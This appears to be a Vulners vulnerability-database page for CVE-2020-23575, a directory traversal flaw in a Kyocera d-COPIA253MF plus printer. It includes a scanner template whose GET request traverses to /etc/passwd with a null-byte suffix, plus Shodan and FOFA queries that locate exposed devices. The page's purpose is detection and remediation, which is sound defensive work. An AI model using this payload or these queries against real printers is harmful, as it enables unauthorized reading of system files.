| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2023-34259 | 3 Nov 202304:15 | – | attackerkb | |
| CVE-2020-23575 | 3 Nov 202306:23 | – | circl | |
| KYOCERA Printer d-COPIA253MF 路径遍历漏洞 | 10 May 202100:00 | – | cnnvd | |
| CVE-2020-23575 | 10 May 202122:24 | – | cve | |
| CVE-2020-23575 | 10 May 202122:24 | – | cvelist | |
| CVE-2020-23575 | 10 May 202123:15 | – | nvd | |
| Generic HTTP Directory Traversal / File Inclusion (Web Dirs) - Active Check | 22 Jul 202100:00 | – | openvas | |
| Directory traversal | 10 May 202123:15 | – | prion | |
| Directory traversal | 3 Nov 202304:15 | – | prion | |
| PT-2021-10916 · Kyocera · Kyocera Printer D-Copia253Mf Plus | 10 May 202100:00 | – | ptsecurity |
| Source | Link |
|---|---|
| exploit-db | www.exploit-db.com/exploits/48561 |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2020-23575 |
| kyoceradocumentsolutions | www.kyoceradocumentsolutions.com.tr/tr.html |
| github | www.github.com/ARPSyndicate/kenzer-templates |
id: CVE-2020-23575
info:
name: Kyocera Printer d-COPIA253MF - Directory Traversal
author: 0x_Akoko
severity: high
description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.
impact: |
An attacker can exploit this vulnerability to read arbitrary files from the server, potentially leading to unauthorized access or sensitive information disclosure.
remediation: |
Apply the latest firmware update provided by Kyocera to fix the directory traversal vulnerability.
reference:
- https://www.exploit-db.com/exploits/48561
- https://nvd.nist.gov/vuln/detail/CVE-2020-23575
- https://www.kyoceradocumentsolutions.com.tr/tr.html
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-23575
cwe-id: CWE-22
epss-score: 0.36765
epss-percentile: 0.98313
cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: kyocera
product: d-copia253mf_plus_firmware
shodan-query: http.favicon.hash:-50306417
fofa-query: icon_hash=-50306417
tags: cve2020,cve,printer,iot,lfi,edb,kyocera,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "root:.*:0:0:"
- "bin:.*:1:1"
condition: or
- type: status
status:
- 200
# digest: 4a0a0047304502206f9aee63e226392e7d2781bf67e003e0994e0d3db7dcf69bba9581bbb7ea6042022100b89713b4587b6f055e75be12b68309326fce1f8f1ea5f499148d67b85f4ef20c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation